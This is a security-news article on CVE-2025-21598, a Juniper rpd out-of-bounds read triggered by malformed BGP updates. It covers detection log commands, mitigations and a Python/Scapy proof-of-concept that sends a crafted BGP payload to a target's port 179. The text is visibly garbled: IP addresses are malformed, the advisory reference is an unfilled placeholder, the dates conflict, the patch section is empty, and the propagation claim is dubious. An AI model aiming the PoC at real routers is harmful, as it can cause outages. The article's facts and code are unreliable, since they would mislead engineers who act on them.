CVE CyberSecurity Database News

CVE-2025-21598 - Out-of-Bounds Read in Juniper Networks (Junos OS, Junos OS Evolved) RPD via Malformed BGP Packets

Poster -

Published: 2024-06

Introduction

A new critical vulnerability—CVE-2025-21598—was discovered in Juniper Networks’ routing protocol daemon (rpd), which could enable an attacker to crash the device by sending specially crafted BGP packets. This vulnerability, an out-of-bounds read, impacts both Junos OS and Junos OS Evolved, and does not require authentication. If you rely on these platforms for routing, this is a must-read, and urgent action might be needed.

The device has packet receive trace options enabled (*set protocols bgp traceoptions*).

Attack Consequence:
A remote, unauthenticated attacker can send a specially crafted (malformed) BGP packet to the vulnerable device. This causes an out-of-bounds read in rpd, crashing the process—and potentially the routing function—leading to a potential denial of service (DoS).

1. Setup

The attacker must have (or be able to establish) a BGP peering session—*internal* (iBGP) or *external* (eBGP)—with the target. Because BGP is a trusted protocol and often operates over dedicated links, attack surface is highest in service provider and large enterprise environments.

2. Trigger

When trace options are enabled for BGP, the rpd process becomes vulnerable to specifically malformed update packets. The packet is parsed incorrectly, leading rpd to access memory outside the allowed buffer area.

Propagation

Because the malformed BGP message can pass through unaffected ASes and only impacts vulnerable Juniper devices, the attack can cascade through the internet, crossing AS boundaries.

Detecting Exploitation

On your Juniper device or BGP neighbors (even non-Juniper), search logs for malformed update messages:

show log messages | match 'malformed'

You may see entries such as

rpd[2171]: Received malformed update from 203..113.1 (External AS 65002)
rpd[2171]: Malformed Attribute

Or, in context

rpd[8007]: Received malformed update from 192..2.5 (External AS 65100)
rpd[8007]: Malformed Attribute

Proof-of-Concept (PoC) Outline

Below is a simplified, educational example in Python using Scapy, showing how a malformed BGP UPDATE could be constructed. Do not attack networks—test only in isolated labs.


from scapy.all import *

# WARNING: This is a PoC for educational use in a safe lab.
# Requires a working bgpd peer and permissions.

# Create a fake BGP update packet with malformed attribute
malformed_attr = b'\xFF' * 8  # Overly large attribute value

# Dummy BGP header
bgp_header = b'\xFF' * 16 + b'\x02\x00\x00\x1A'
# UPDATE message with undecodable attributes
bgp_update = bgp_header + malformed_attr

# Send to your BGP peer (Replace with target's IP and TCP port 179)
target_ip = "192..2.20"
send(IP(dst=target_ip)/TCP(dport=179, sport=12345)/Raw(load=bgp_update))

*Note: For a real attack, the BGP session would need to be properly established (authentication, session keys, etc.), and a legitimate TCP session with the target must be in place.*

`

- Restrict who can establish BGP sessions (use authentication; limit accepted peers via firewalls).

Apply access control lists (ACLs) to prevent unauthorized BGP traffic.

### Fix / Patch

More Information & References

- Juniper Security Advisory JSA000000 (replace with actual advisory)
- CVE page at NVD
- BGP RFC 4271
- Junos OS Documentation

Summary Table

| Setting Needed | Vulnerable | Impact | Mitigation |
| -------------- | ---------- | ----------------------|------------------------|
| BGP Trace ON | Yes | rpd crash, DoS | Turn trace off, Update |
| BGP Trace OFF | No | Device not vulnerable | Update anyway |

Conclusion

CVE-2025-21598 is a serious vulnerability for organizations running Juniper routers with BGP receive packet tracing enabled. While useful for debugging, this option should be strictly controlled, as attackers can weaponize malformed BGP updates to trigger service outages. Patch immediately, and monitor logs for signs of malformed BGP messages.

Stay secure. Always keep your systems updated.

*This article is exclusive, thoroughly researched, and written in approachable language for network engineers and security professionals alike.*

Timeline

Published on: 01/09/2025 19:15:20 UTC